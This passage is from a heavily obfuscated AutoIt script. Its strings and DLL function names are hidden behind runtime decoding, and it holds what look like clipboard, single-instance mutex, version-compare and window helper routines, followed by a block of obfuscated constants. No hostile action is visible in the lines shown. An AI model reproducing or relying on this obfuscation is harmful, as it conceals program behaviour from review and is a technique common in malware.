  6422.     If $a505a20190d[Number($a1110025354)] = Number($a301012152f) Then Return SetError(-Number($a231022291a), -Number($a3910321537), -Number($a3410424d53))
  6423.     Local $a3810522417 = DllStructGetData($a551db02607, $a321062550b)
  6424.     If StringLen($a3810522417) = Number($a4e10722549) AND StringLen($a14efb11243) > Number($a3210823c24) Then $a3810522417 = $a14efb11243
  6425.     If DllStructGetData($a551db02607, $a3210920054) Then $a29ff110740 = Number($a5a10a20425)
  6426.     If DllStructGetData($a551db02607, $a0210b21f37) Then $a1dff314d3b = Number($a2410c2491e)
  6427.     If DllStructGetData($a551db02607, $a5710d22c02) Then $a16ff515f59 = Number($a3110e23523)
  6428.     Local $a3010f22b0b = BitOR($a29ff110740, $a1dff314d3b, $a16ff515f59)
  6429.     Local $a3420023537 = DllStructGetData($a1effc12c13, $a4720121055) / Number($a152022462c)
  6430.     Local $a3820321b26 = DllStructGetData($a1effc12c13, $a3820421434)
  6431.     Local $a2f20520a51 = DllStructGetData($a551db02607, $a4a20622822)
  6432.     Local $a09df915e61 = Hex(String($a3820321b26), Number($a292072560b))
  6433.     Return StringSplit($a3010f22b0b & $a4b20823f4e & $a3810522417 & $a1c20920e35 & $a3420023537 & $a1e20a20701 & $a2f20520a51 & $a3d20b20d46 & $a3820321b26 & $a3f20c21a29 & $a0b20d25d0f & $a09df915e61 & $a0b20e20542 & $a1620f2204a & StringMid($a09df915e61, Number($a4630021e10), Number($a3a30122820)) & StringMid($a09df915e61, Number($a0230222802), Number($a2a30323455)) & StringMid($a09df915e61, Number($a1e30423c63), Number($a6030521744)), $a5030626340)
  6434. EndFunc
  6435.  
  6436. Func a4141e04647($a177e102c17, $a2f9131520e = "|")
  6437.     If NOT IsDeclared("SSA4141E04647") Then
  6438.         Global $a4430722c3b = a2b00005424($os[5827]), $a5b30924855 = a2b00005424($os[5828]), $a4630b23018 = a2b00005424($os[5829]), $a0730c23306 = a2b00005424($os[5830]), $a4e30d24a0b = a2b00005424($os[5831]), $a4a30e21d1c = a2b00005424($os[5832]), $a5c30f20908 = a2b00005424($os[5833]), $a1e40020e0d = a2b00005424($os[5834]), $a0a40122f08 = a2b00005424($os[5835]), $a2e40223a32 = a2b00005424($os[5836]), $a5540325f34 = a2b00005424($os[5837]), $a2140422013 = a2b00005424($os[5838]), $a4b40521c35 = a2b00005424($os[5839]), $a504062032e = a2b00005424($os[5840]), $a164072554a = a2b00005424($os[5841]), $a0140826244 = a2b00005424($os[5842]), $a1b4092320c = a2b00005424($os[5843]), $a3140a24647 = a2b00005424($os[5844]), $a3640b21456 = a2b00005424($os[5845]), $a5240c20335 = a2b00005424($os[5846]), $a1c40d22951 = a2b00005424($os[5847]), $a4d40e22e34 = a2b00005424($os[5848]), $a1840f24718 = a2b00005424($os[5849]), $a175002424b = a2b00005424($os[5850]), $a4350121430 = a2b00005424($os[5851]), $a3450222912 = a2b00005424($os[5852]), $a2050423749 = a2b00005424($os[5853]), $a4150521255 = a2b00005424($os[5854]), $a6150623209 = a2b00005424($os[5855]), $a3950723835 = a2b00005424($os[5856]), $a5a50824b2d = a2b00005424($os[5857]), $a4c50925b31 = a2b00005424($os[5858]), $a3950a2315a = a2b00005424($os[5859]), $a2150c22c3a = a2b00005424($os[5860]), $a1350e2410a = a2b00005424($os[5861]), $a5450f2432e = a2b00005424($os[5862]), $a4460024e30 = a2b00005424($os[5863]), $a4b60124017 = a2b00005424($os[5864]), $a3e60222658 = a2b00005424($os[5865]), $a1560325350 = a2b00005424($os[5866]), $a4560521300 = a2b00005424($os[5867]), $a5f60626212 = a2b00005424($os[5868]), $a2e60724901 = a2b00005424($os[5869]), $a5460823143 = a2b00005424($os[5870]), $a1460925732 = a2b00005424($os[5871]), $a3b60a22f38 = a2b00005424($os[5872]), $a2460b24838 = a2b00005424($os[5873]), $a3360c21e4c = a2b00005424($os[5874]), $a3a60d2461e = a2b00005424($os[5875]), $a5460e25f50 = a2b00005424($os[5876]), $a2f60f25238 = a2b00005424($os[5877]), $a2270022127 = a2b00005424($os[5878])
  6439.         Global $a537012135a = a2b00005424($os[5879]), $a5970222814 = a2b00005424($os[5880]), $a5970325435 = a2b00005424($os[5881]), $a1970425b29 = a2b00005424($os[5882]), $a4a70521726 = a2b00005424($os[5883]), $a557062221d = a2b00005424($os[5884]), $a547072555d = a2b00005424($os[5885]), $a367082300b = a2b00005424($os[5886]), $a427092264f = a2b00005424($os[5887]), $a3070a25112 = a2b00005424($os[5888]), $a2f70b23b49 = a2b00005424($os[5889]), $a0b70c23229 = a2b00005424($os[5890]), $a4870d2382e = a2b00005424($os[5891]), $a5470e23f0e = a2b00005424($os[5892]), $a2570f21a2d = a2b00005424($os[5893]), $a448002403e = a2b00005424($os[5894]), $a0980120d02 = a2b00005424($os[5895]), $a238022514a = a2b00005424($os[5896]), $a058032021e = a2b00005424($os[5897]), $a0d80424c28 = a2b00005424($os[5898]), $a5f8052092d = a2b00005424($os[5899]), $a6380621a46 = a2b00005424($os[5900]), $a4d80722108 = a2b00005424($os[5901]), $a3280824b53 = a2b00005424($os[5902]), $a2680925b29 = a2b00005424($os[5903]), $a3d80a24748 = a2b00005424($os[5904]), $a3c80b23249 = a2b00005424($os[5905])
  6440.         Global $ssa4141e04647 = 1
  6441.     EndIf
  6442.     Local Const $a2df7400f54 = Number($a4430722c3b), $a313082302e = Number($a5b30924855)
  6443.     $a177e102c17 &= $a2f9131520e & $a2f9131520e
  6444.     Local $a5230a24d38 = Number($a4630b23018) * (StringLen($a177e102c17) + Number($a0730c23306))
  6445.     Local $a505a20190d = DllCall($a4e30d24a0b, $a4a30e21d1c, $a5c30f20908, $a1e40020e0d, Number($a0a40122f08))
  6446.     If @error OR $a505a20190d[Number($a2e40223a32)] = Number($a5540325f34) Then Return SetError(Number($a2140422013), a3e00102e0a(), False)
  6447.     Local $a3182a1024a = Number($a4b40521c35), $a4382b16262 = Number($a504062032e)
  6448.     $a505a20190d = DllCall($a164072554a, $a0140826244, $a1b4092320c)
  6449.     If @error OR NOT $a505a20190d[Number($a3140a24647)] Then
  6450.         $a3182a1024a = Number($a3640b21456)
  6451.         $a4382b16262 = a3e00102e0a()
  6452.     Else
  6453.         $a505a20190d = DllCall($a5240c20335, $a1c40d22951, $a4d40e22e34, $a1840f24718, $a2df7400f54, $a175002424b, $a5230a24d38)
  6454.         If @error OR NOT $a505a20190d[Number($a4350121430)] Then
  6455.             $a3182a1024a = Number($a3450222912)
  6456.             $a4382b16262 = a3e00102e0a()
  6457.         Else
  6458.             Local $a5050322d4a = $a505a20190d[Number($a2050423749)]
  6459.             $a505a20190d = DllCall($a4150521255, $a6150623209, $a3950723835, $a5a50824b2d, $a5050322d4a)
  6460.             If @error OR NOT $a505a20190d[Number($a4c50925b31)] Then
  6461.                 $a3182a1024a = Number($a3950a2315a)
  6462.                 $a4382b16262 = a3e00102e0a()
  6463.             Else
  6464.                 Local $a4850b22130 = $a505a20190d[Number($a2150c22c3a)]
  6465.                 Local $a0350d25a24 = DllStructCreate($a1350e2410a & $a2928c0302e & $a5450f2432e & StringLen($a177e102c17) + Number($a4460024e30) & $a4b60124017, $a4850b22130)
  6466.                 If @error Then Return SetError(Number($a3e60222658), Number($a1560325350), False)
  6467.                 Local $a216042302c = DllStructCreate($a4560521300)
  6468.                 DllStructSetData($a0350d25a24, $a5f60626212, DllStructGetSize($a216042302c))
  6469.                 DllStructSetData($a0350d25a24, $a2e60724901, Number($a5460823143))
  6470.                 DllStructSetData($a0350d25a24, $a1460925732, Number($a3b60a22f38))
  6471.                 DllStructSetData($a0350d25a24, $a2460b24838, Number($a3360c21e4c))
  6472.                 DllStructSetData($a0350d25a24, $a3a60d2461e, Number($a5460e25f50))
  6473.                 DllStructSetData($a0350d25a24, Number($a2f60f25238), $a177e102c17)
  6474.                 For $a3800e12616 = Number($a2270022127) To StringLen($a177e102c17)
  6475.                     If DllStructGetData($a0350d25a24, Number($a537012135a), $a3800e12616) = $a2f9131520e Then DllStructSetData($a0350d25a24, Number($a5970222814), Chr(Number($a5970325435)), $a3800e12616)
  6476.                 Next
  6477.                 $a505a20190d = DllCall($a1970425b29, $a4a70521726, $a557062221d, $a547072555d, $a313082302e, $a367082300b, $a5050322d4a)
  6478.                 If @error OR NOT $a505a20190d[Number($a427092264f)] Then
  6479.                     $a3182a1024a = Number($a3070a25112)
  6480.                     $a4382b16262 = a3e00102e0a()
  6481.                 EndIf
  6482.                 $a505a20190d = DllCall($a2f70b23b49, $a0b70c23229, $a4870d2382e, $a5470e23f0e, $a5050322d4a)
  6483.                 If (@error OR NOT $a505a20190d[Number($a2570f21a2d)]) AND NOT $a3182a1024a AND a3e00102e0a() Then
  6484.                     $a3182a1024a = Number($a448002403e)
  6485.                     $a4382b16262 = a3e00102e0a()
  6486.                 EndIf
  6487.             EndIf
  6488.             $a505a20190d = DllCall($a0980120d02, $a238022514a, $a058032021e, $a0d80424c28, $a5050322d4a)
  6489.             If (@error OR $a505a20190d[Number($a5f8052092d)]) AND NOT $a3182a1024a Then
  6490.                 $a3182a1024a = Number($a6380621a46)
  6491.                 $a4382b16262 = a3e00102e0a()
  6492.             EndIf
  6493.         EndIf
  6494.     EndIf
  6495.     $a505a20190d = DllCall($a4d80722108, $a3280824b53, $a2680925b29)
  6496.     If (@error OR NOT $a505a20190d[Number($a3d80a24748)]) AND NOT $a3182a1024a Then Return SetError(Number($a3c80b23249), a3e00102e0a(), False)
  6497.     If $a3182a1024a Then Return SetError($a3182a1024a, $a4382b16262, False)
  6498.     Return True
  6499. EndFunc
  6500.  
  6501. Func a4141f04129($a0580c25a5c, $a0a80d20e3e, $a6080e23e31)
  6502.     If $a0580c25a5c Then
  6503.         Return $a0a80d20e3e
  6504.     Else
  6505.         Return $a6080e23e31
  6506.     EndIf
  6507. EndFunc
  6508.  
  6509. Func a2b51005a49($a4e80f21d5a = 0, $a3490021e07 = 0, $a339012351e = 0, $a5090224b2d = 0)
  6510.     If NOT IsDeclared("SSA2B51005A49") Then
  6511.         Global $a2d90324b53 = a2b00005424($os[5906]), $a0c90425343 = a2b00005424($os[5907]), $a4990526248 = a2b00005424($os[5908]), $a0590625f14 = a2b00005424($os[5909]), $a2390720520 = a2b00005424($os[5910]), $a2390825155 = a2b00005424($os[5911]), $a3a90922a3a = a2b00005424($os[5912]), $a6090a2114d = a2b00005424($os[5913]), $a0690b2165b = a2b00005424($os[5914]), $a5090c2500f = a2b00005424($os[5915]), $a0190d21839 = a2b00005424($os[5916]), $a1c90e2081a = a2b00005424($os[5917]), $a3690f24a44 = a2b00005424($os[5918]), $a3da002282c = a2b00005424($os[5919]), $a22a0122f5b = a2b00005424($os[5920]), $a21a0223712 = a2b00005424($os[5921]), $a15a0322244 = a2b00005424($os[5922]), $a55a0421848 = a2b00005424($os[5923]), $a20a052481b = a2b00005424($os[5924]), $a3aa0625d01 = a2b00005424($os[5925]), $a04a0720e3a = a2b00005424($os[5926]), $a63a0820407 = a2b00005424($os[5927]), $a60a0924b26 = a2b00005424($os[5928])
  6512.         Global $ssa2b51005a49 = 1
  6513.     EndIf
  6514.     Local $a505a20190d
  6515.     If Execute($a2d90324b53) == Number($a0c90425343) Then
  6516.         $a505a20190d = DllCall($a4990526248, $a0590625f14, $a2390720520, $a2390825155, Number($a3a90922a3a))
  6517.         If @error OR NOT $a505a20190d[Number($a6090a2114d)] Then Return SetError(Number($a0690b2165b), a3e00102e0a(), False)
  6518.     Else
  6519.         If Execute($a5090c2500f) == Number($a0190d21839) Then
  6520.             $a339012351e = $a4e80f21d5a + Number($a1c90e2081a)
  6521.             $a5090224b2d = $a3490021e07 + Number($a3690f24a44)
  6522.         EndIf
  6523.         Local $a2f6de02137 = DllStructCreate($a2a28e05730)
  6524.         DllStructSetData($a2f6de02137, $a3da002282c, $a4e80f21d5a)
  6525.         DllStructSetData($a2f6de02137, $a22a0122f5b, $a3490021e07)
  6526.         DllStructSetData($a2f6de02137, $a21a0223712, $a339012351e)
  6527.         DllStructSetData($a2f6de02137, $a15a0322244, $a5090224b2d)
  6528.         $a505a20190d = DllCall($a55a0421848, $a20a052481b, $a3aa0625d01, $a04a0720e3a, $a2f6de02137)
  6529.         If @error OR NOT $a505a20190d[Number($a63a0820407)] Then Return SetError(Number($a60a0924b26), a3e00102e0a(), False)
  6530.     EndIf
  6531.     Return True
  6532. EndFunc
  6533.  
  6534. Func a3751102d08($a42a0a2243b, $a5d8f00532a = 0)
  6535.     If NOT IsDeclared("SSA3751102D08") Then
  6536.         Global $a34a0c21d60 = a2b00005424($os[5929]), $a34a0e2060d = a2b00005424($os[5930]), $a3bb0023043 = a2b00005424($os[5931]), $a4bb0124932 = a2b00005424($os[5932]), $a25b0324f19 = a2b00005424($os[5933]), $a26b0520b0b = a2b00005424($os[5934]), $a3eb0620c32 = a2b00005424($os[5935]), $a16b0721e5d = a2b00005424($os[5936]), $a0cb082195c = a2b00005424($os[5937]), $a05b0922a1e = a2b00005424($os[5938]), $a53b0a26051 = a2b00005424($os[5939]), $a57b0b2320b = a2b00005424($os[5940]), $a17b0c20b03 = a2b00005424($os[5941]), $a46b0d2435c = a2b00005424($os[5942]), $a1fb0e2025c = a2b00005424($os[5943]), $a0db0f25e21 = a2b00005424($os[5944]), $a4dc0022f59 = a2b00005424($os[5945]), $a13c0121b18 = a2b00005424($os[5946]), $a3dc0225b4d = a2b00005424($os[5947]), $a36c0325f34 = a2b00005424($os[5948]), $a31c0425641 = a2b00005424($os[5949]), $a5ec0522a01 = a2b00005424($os[5950]), $a5ac0623f16 = a2b00005424($os[5951]), $a20c0720245 = a2b00005424($os[5952]), $a40c0822e44 = a2b00005424($os[5953]), $a18c0922017 = a2b00005424($os[5954]), $a2dc0a24157 = a2b00005424($os[5955]), $a45c0b25f07 = a2b00005424($os[5956]), $a49c0d20c34 = a2b00005424($os[5957]), $a62c0e23838 = a2b00005424($os[5958]), $a34c0f2385f = a2b00005424($os[5959]), $a25d0023135 = a2b00005424($os[5960]), $a36d012051a = a2b00005424($os[5961]), $a02d0220800 = a2b00005424($os[5962]), $a2bd0325a3e = a2b00005424($os[5963]), $a2cd0426359 = a2b00005424($os[5964]), $a00d0621057 = a2b00005424($os[5965]), $a33d0720603 = a2b00005424($os[5966]), $a43d082583c = a2b00005424($os[5967]), $a03d0921d05 = a2b00005424($os[5968]), $a05d0a21315 = a2b00005424($os[5969]), $a34d0b22751 = a2b00005424($os[5970]), $a14d0c22747 = a2b00005424($os[5971]), $a4ad0d26326 = a2b00005424($os[5972]), $a27d0e22d44 = a2b00005424($os[5973]), $a0dd0f26229 = a2b00005424($os[5974]), $a24e002242f = a2b00005424($os[5975])
  6537.         Global $ssa3751102d08 = 1
  6538.     EndIf
  6539.     Local Const $a3fa0b20846 = Number($a34a0c21d60)
  6540.     Local Const $a3aa0d23544 = Number($a34a0e2060d)
  6541.     Local $a40a0f25535 = Number($a3bb0023043)
  6542.     If BitAND($a5d8f00532a, Number($a4bb0124932)) Then
  6543.         Local $a3eb0221957 = DllStructCreate($a25b0324f19)
  6544.         Local $a14b0420743 = DllCall($a26b0520b0b, $a3eb0620c32, $a16b0721e5d, $a0cb082195c, $a3eb0221957, $a05b0922a1e, $a3aa0d23544)
  6545.         If @error Then Return SetError(@error, @extended, Number($a53b0a26051))
  6546.         If $a14b0420743[Number($a57b0b2320b)] Then
  6547.             $a14b0420743 = DllCall($a17b0c20b03, $a46b0d2435c, $a1fb0e2025c, $a0db0f25e21, $a3eb0221957, $a4dc0022f59, Number($a13c0121b18), $a3dc0225b4d, Number($a36c0325f34), $a31c0425641, Number($a5ec0522a01))
  6548.             If @error Then Return SetError(@error, @extended, Number($a5ac0623f16))
  6549.             If $a14b0420743[Number($a20c0720245)] Then
  6550.                 $a40a0f25535 = DllStructCreate($a1619e02f15)
  6551.                 DllStructSetData($a40a0f25535, Number($a40c0822e44), DllStructGetSize($a40a0f25535))
  6552.                 DllStructSetData($a40a0f25535, Number($a18c0922017), DllStructGetPtr($a3eb0221957))
  6553.                 DllStructSetData($a40a0f25535, Number($a2dc0a24157), Number($a45c0b25f07))
  6554.             EndIf
  6555.         EndIf
  6556.     EndIf
  6557.     Local $a12c0c2195f = DllCall($a49c0d20c34, $a62c0e23838, $a34c0f2385f, $a25d0023135, $a40a0f25535, $a36d012051a, Number($a02d0220800), $a2bd0325a3e, $a42a0a2243b)
  6558.     If @error Then Return SetError(@error, @extended, Number($a2cd0426359))
  6559.     Local $a2cd052582b = DllCall($a00d0621057, $a33d0720603, $a43d082583c)
  6560.     If @error Then Return SetError(@error, @extended, Number($a03d0921d05))
  6561.     If $a2cd052582b[Number($a05d0a21315)] = $a3fa0b20846 Then
  6562.         If BitAND($a5d8f00532a, Number($a34d0b22751)) Then
  6563.             Return SetError($a2cd052582b[Number($a14d0c22747)], $a2cd052582b[Number($a4ad0d26326)], Number($a27d0e22d44))
  6564.         Else
  6565.             Exit -Number($a0dd0f26229)
  6566.         EndIf
  6567.     EndIf
  6568.     Return $a12c0c2195f[Number($a24e002242f)]
  6569. EndFunc
  6570.  
  6571. Func a5051200547($a0de0125260, $a3ee0223e38 = "user32.dll")
  6572.     If NOT IsDeclared("SSA5051200547") Then
  6573.         Global $a4be0421047 = a2b00005424($os[5976]), $a43e0524611 = a2b00005424($os[5977]), $a22e062583b = a2b00005424($os[5978]), $a2de0722043 = a2b00005424($os[5979]), $a38e0821533 = a2b00005424($os[5980]), $a21e0924332 = a2b00005424($os[5981]), $a5be0a23c00 = a2b00005424($os[5982])
  6574.         Global $ssa5051200547 = 1
  6575.     EndIf
  6576.     Local $a01e0321632 = DllCall($a3ee0223e38, $a4be0421047, $a43e0524611, $a22e062583b, $a2de0722043 & $a0de0125260)
  6577.     If @error Then Return SetError(@error, @extended, False)
  6578.     Return BitAND($a01e0321632[Number($a38e0821533)], Number($a21e0924332)) <> Number($a5be0a23c00)
  6579. EndFunc
  6580.  
  6581. Func a345130472e($a56e0b25c1c, $a54e0c25216)
  6582.     If NOT IsDeclared("SSA345130472E") Then
  6583.         Global $a53e0d20c2a = a2b00005424($os[5983]), $a39e0f2144e = a2b00005424($os[5984]), $a3ef0023461 = a2b00005424($os[5985]), $a2af0124a4c = a2b00005424($os[5986]), $a4ff0422622 = a2b00005424($os[5987]), $a33f0525417 = a2b00005424($os[5988]), $a61f0622d3f = a2b00005424($os[5989]), $a50f0720903 = a2b00005424($os[5990]), $a41f0821402 = a2b00005424($os[5991]), $a16f0924059 = a2b00005424($os[5992]), $a07f0a21136 = a2b00005424($os[5993]), $a27f0b24046 = a2b00005424($os[5994]), $a31f0c22a0b = a2b00005424($os[5995]), $a22f0d26152 = a2b00005424($os[5996]), $a43f0e20526 = a2b00005424($os[5997]), $a2cf0f21f31 = a2b00005424($os[5998]), $a2f01021e46 = a2b00005424($os[5999]), $a1401122d04 = a2b00005424($os[6000])
  6584.         Global $ssa345130472e = 1
  6585.     EndIf
  6586.     If $a56e0b25c1c = $a54e0c25216 Then Return Number($a53e0d20c2a)
  6587.     Local $a0ee0e20463 = $a39e0f2144e
  6588.     If StringInStr($a56e0b25c1c, $a0ee0e20463) = Number($a3ef0023461) Then $a0ee0e20463 = $a2af0124a4c
  6589.     Local $a08f0223019 = StringSplit($a56e0b25c1c, $a0ee0e20463)
  6590.     Local $a23f0325201 = StringSplit($a54e0c25216, $a0ee0e20463)
  6591.     If UBound($a08f0223019) <> UBound($a23f0325201) OR UBound($a08f0223019) = Number($a4ff0422622) Then
  6592.         SetExtended(Number($a33f0525417))
  6593.         If $a56e0b25c1c > $a54e0c25216 Then
  6594.             Return Number($a61f0622d3f)
  6595.         ElseIf $a56e0b25c1c < $a54e0c25216 Then
  6596.             Return -Number($a50f0720903)
  6597.         EndIf
  6598.     Else
  6599.         For $a3800e12616 = Number($a41f0821402) To UBound($a08f0223019) - Number($a16f0924059)
  6600.             If StringIsDigit($a08f0223019[$a3800e12616]) AND StringIsDigit($a23f0325201[$a3800e12616]) Then
  6601.                 If Number($a08f0223019[$a3800e12616]) > Number($a23f0325201[$a3800e12616]) Then
  6602.                     Return Number($a07f0a21136)
  6603.                 ElseIf Number($a08f0223019[$a3800e12616]) < Number($a23f0325201[$a3800e12616]) Then
  6604.                     Return -Number($a27f0b24046)
  6605.                 EndIf
  6606.             Else
  6607.                 SetExtended(Number($a31f0c22a0b))
  6608.                 If $a08f0223019[$a3800e12616] > $a23f0325201[$a3800e12616] Then
  6609.                     Return Number($a22f0d26152)
  6610.                 ElseIf $a08f0223019[$a3800e12616] < $a23f0325201[$a3800e12616] Then
  6611.                     Return -Number($a43f0e20526)
  6612.                 EndIf
  6613.             EndIf
  6614.         Next
  6615.     EndIf
  6616.     Return SetError(Number($a2cf0f21f31), Number($a2f01021e46), Number($a1401122d04))
  6617. EndFunc
  6618.  
  6619. Func a0251401129($a3eca000d54)
  6620.     If NOT IsDeclared("SSA0251401129") Then
  6621.         Global $a1401221e04 = a2b00005424($os[6001]), $a2401322011 = a2b00005424($os[6002]), $a380142351d = a2b00005424($os[6003]), $a1a0152511a = a2b00005424($os[6004]), $a0901624611 = a2b00005424($os[6005]), $a2b01724700 = a2b00005424($os[6006]), $a110182255d = a2b00005424($os[6007]), $a0501922d16 = a2b00005424($os[6008])
  6622.         Global $ssa0251401129 = 1
  6623.     EndIf
  6624.     Local $a505a20190d = DllCall($a1401221e04, $a2401322011, $a380142351d, $a1a0152511a, $a3eca000d54)
  6625.     If @error OR NOT $a505a20190d[Number($a0901624611)] Then Return SetError(Number($a2b01724700), a3e00102e0a(), Number($a110182255d))
  6626.     Return $a505a20190d[Number($a0501922d16)]
  6627. EndFunc
  6628.  
  6629. Func a2e51503047($a32ac505260, $a577e20612b)
  6630.     If NOT IsDeclared("SSA2E51503047") Then
  6631.         Global $a2501a21955 = a2b00005424($os[6009]), $a6101b24f1f = a2b00005424($os[6010]), $a1301c24c08 = a2b00005424($os[6011]), $a2c01d22e39 = a2b00005424($os[6012]), $a5301e22320 = a2b00005424($os[6013]), $a3501f20b35 = a2b00005424($os[6014]), $a4d1102444f = a2b00005424($os[6015])
  6632.         Global $ssa2e51503047 = 1
  6633.     EndIf
  6634.     Local $a505a20190d = DllCall($a2501a21955, $a6101b24f1f, $a1301c24c08, $a2c01d22e39, $a32ac505260, $a5301e22320, $a577e20612b)
  6635.     If @error Then Return SetError(@error, @extended, Number($a3501f20b35))
  6636.     Return $a505a20190d[Number($a4d1102444f)]
  6637. EndFunc
  6638.  
  6639. Func a2b51603736($a3eca000d54, $a32ac505260)
  6640.     If NOT IsDeclared("SSA2B51603736") Then
  6641.         Global $a1711123e17 = a2b00005424($os[6016]), $a1611220f33 = a2b00005424($os[6017]), $a1511324b4c = a2b00005424($os[6018]), $a2011426047 = a2b00005424($os[6019]), $a2911524755 = a2b00005424($os[6020]), $a0511620824 = a2b00005424($os[6021]), $a4411724023 = a2b00005424($os[6022])
  6642.         Global $ssa2b51603736 = 1
  6643.     EndIf
  6644.     Local $a505a20190d = DllCall($a1711123e17, $a1611220f33, $a1511324b4c, $a2011426047, $a3eca000d54, $a2911524755, $a32ac505260)
  6645.     If @error Then Return SetError(@error, @extended, False)
  6646.     Return $a505a20190d[Number($a0511620824)] <> Number($a4411724023)
  6647. EndFunc
  6648.  
  6649. Global Const $a1711825042 = -Number($a0f1192634e)
  6650. Global Const $a3311a2615a = -Number($a5811b24a5b)
  6651. Global Const $a5a11c24b07 = -Number($a3611d23d2d)
  6652. Global Const $a0511e2482d = -Number($a0011f2394f)
  6653. Global Const $a3c21023110 = Number($a3821124134)
  6654. Global Const $a0d21222263 = Number($a4221321262)
  6655. Global Const $a6121425c48 = Number($a2421520c31)
  6656. Global Const $a5f21623d38 = Number($a4a21724f2d)
  6657. Global Const $a3c21820040 = Number($a2b21922346)
  6658. Global Const $a5b21a25441 = Number($a1921b2510b)
  6659. Global Const $a5e21c23a0e = Number($a0b21d25b3a)
  6660. Global Const $a0e21e25555 = Number($a5021f22c2e)
  6661. Global Const $a5a31025045 = Number($a3231123833)
  6662. Global Const $a3831223203 = Number($a5c3132142e)
  6663. Global Const $a4e31423a17 = Number($a2431525755)
  6664. Global Const $a4431620151 = Number($a6131721a44)
  6665. Global Const $a093182451f = Number($a5531920759)
  6666. Global Const $a3331a22011 = Number($a0a31b2020b)
  6667. Global Const $a5031c2045a = Number($a6031d23417)
  6668. Global Const $a4131e2492c = Number($a5331f23c0c)
  6669. Global Const $a1641025607 = Number($a6041120351)
  6670. Global Const $a3a41222a08 = Number($a5d41323c37)
  6671. Global Const $a4e41422f13 = Number($a5641525844)
  6672. Global Const $a324162170c = Number($a0b41722d54)
  6673. Global Const $a1a41822902 = Number($a5041923d3a)
  6674. Global Const $a2e41a20b2c = Number($a0741b24e10)
  6675. Global Const $a0941c23e63 = Number($a4241d22205)
  6676. Global Const $a0c41e25b13 = Number($a5341f21829)
  6677. Global Const $a0151020e4f = ($a1641025607 + Number($a495112320b))
  6678. Global Const $a1b51223443 = Number($a1c5132602a)
  6679. Global Const $a1251421760 = Number($a065152623c)
  6680. Global Const $a2b51625108 = Number($a195172002e)
  6681. Global Const $a0051825128 = Number($a355192073c)
  6682. Global Const $a2451a25612 = Number($a0f51b2562f)
  6683. Global Const $a6051c21d15 = Number($a0851d23256)
  6684. Global Const $a1b51e2260f = Number($a1751f2020c)
  6685. Global Const $a3461025e12 = Number($a4f61123009)
  6686. Global Const $a606122481b = Number($a1e61320f5b)
  6687. Global Const $a0f61421627 = Number($a4d6152490b)
  6688. Global Const $a3a61625112 = Number($a6161724e48)
  6689. Global Const $a2561821c24 = Number($a4461923845)
  6690. Global Const $a1961a23047 = Number($a3361b20d1b)
  6691. Global Const $a0a61c23c43 = Number($a2f61d25805)
  6692. Global Const $a5e61e22f1c = Number($a3361f2604e)
  6693. Global Const $a297102404b = Number($a2e71122a4c)
  6694. Global Const $a5c71224c37 = Number($a3871320063)
  6695. Global Const $a3871424652 = Number($a2a71522b37)
  6696. Global Const $a2571623910 = Number($a1371721741)
  6697. Global Const $a1871821731 = ($a1641025607 + Number($a3a71921f02))
  6698. Global Const $a0a71a23a3e = Number($a2271b25e08)
  6699. Global Const $a4d71c21133 = Number($a5e71d26221)
  6700. Global Const $a0e71e23252 = Number($a2b71f2454f)
  6701. Global Const $a3181022d28 = Number($a4481124f59)
  6702. Global Const $a4281223011 = Number($a5981322c55)
  6703. Global Const $a2981423f1c = Number($a3b81520642)
  6704. Global Const $a548162124e = Number($a4181721113)
  6705. Global Const $a4181823a59 = Number($a0f8192513f)
  6706. Global Const $a3681a20361 = Number($a3c81b21b62)
  6707. Global Const $a4281c2211c = Number($a4f81d2274d)
  6708. Global Const $a0281e21742 = Number($a3981f25b0a)
  6709. Global Const $a5b91026161 = Number($a5291124228)
  6710. Global Const $a219122451a = Number($a3891325b25)
  6711. Global Const $a1d91422837 = Number($a2091520653)
  6712. Global Const $a2d91621300 = Number($a4691724130)
  6713. Global Const $a2c91821a38 = Number($a4891920a2a)
  6714. Global Const $a5791a22c49 = (-Number($a1591b22833))
  6715. Global Const $a0c91c2185a = Number($a5a91d21d5d)
  6716. Global Const $a3891e24752 = Number($a3991f26038)
  6717. Global Const $a38a102183f = Number($a00a1124f2e)
  6718. Global Const $a35a1220410 = Number($a3ea1322c44)
  6719. Global Const $a54a1423e4c = Number($a46a1520915)
  6720. Global Const $a4da1622250 = Number($a51a172315c)
  6721. Global Const $a23a182084f = Number($a21a1923a21)
  6722. Global Const $a1ca1a23949 = Number($a3ea1b26161)
  6723. Global Const $a24a1c26203 = Number($a3aa1d20520)
  6724. Global Const $a0da1e20e54 = Number($a43a1f24317)
  6725. Global Const $a28b1022029 = $a4e41422f13
  6726. Global Const $a43b112101b = ($a0da1e20e54 + Number($a06b122472f))
  6727. Global Const $a20b1326343 = ($a0da1e20e54 + Number($a01b1420146))
  6728. Global Const $a13b1524e2c = ($a0da1e20e54 + Number($a3eb1621031))
  6729. Global Const $a50b1724408 = ($a0da1e20e54 + Number($a50b1822821))
  6730. Global Const $a62b1920d26 = ($a0da1e20e54 + Number($a47b1a23d5c))
  6731. Global Const $a26b1b2570c = ($a0da1e20e54 + Number($a0db1c23754))
  6732. Global Const $a4fb1d22e4d = ($a0da1e20e54 + Number($a04b1e2121c))
  6733. Global Const $a2bb1f20c49 = Number($a1cc1023b1e) + Number($a2cc1125c16)
  6734. Global Const $a1dc1220f47 = ($a0da1e20e54 + Number($a57c1323162))
  6735. Global Const $a5fc1421050 = ($a0da1e20e54 + Number($a4bc1524310))
  6736. Global Const $a61c1623517 = ($a0da1e20e54 + Number($a1bc1726025))
  6737. Global Const $a1ec1824e27 = ($a0da1e20e54 + Number($a29c1921e60))
  6738. Global Const $a16c1a23c3b = ($a0da1e20e54 + Number($a1dc1b24c46))
  6739. Global Const $a0ec1c21f39 = ($a0da1e20e54 + Number($a3ac1d20406))
  6740. Global Const $a2bc1e23c4c = ($a0da1e20e54 + Number($a2cc1f22548))
  6741. Global Const $a03d1023b10 = ($a0da1e20e54 + Number($a05d1121017))
  6742. Global Const $a31d122465d = Number($a19d1320043) + Number($a2ed142043f)
  6743. Global Const $a54d1522a17 = Number($a52d1623612) + Number($a0dd172492e)
  6744. Global Const $a1ed182315c = (-Number($a5ad1924663))
  6745. Global Const $a02d1a2133d = (-Number($a57d1b22612))
  6746. Global Const $a14d1c20e36 = ($a1ed182315c - Number($a62d1d2154d))
  6747. Global Const $a5dd1e24753 = ($a1ed182315c - Number($a44d1f23559))
  6748. Global Const $a14e1025043 = ($a1ed182315c - Number($a5ce1125403))
  6749. Global Const $a47e1223326 = ($a1ed182315c - Number($a0ce1322963))
  6750. Global Const $a51e1420b43 = ($a1ed182315c - Number($a11e1523734))
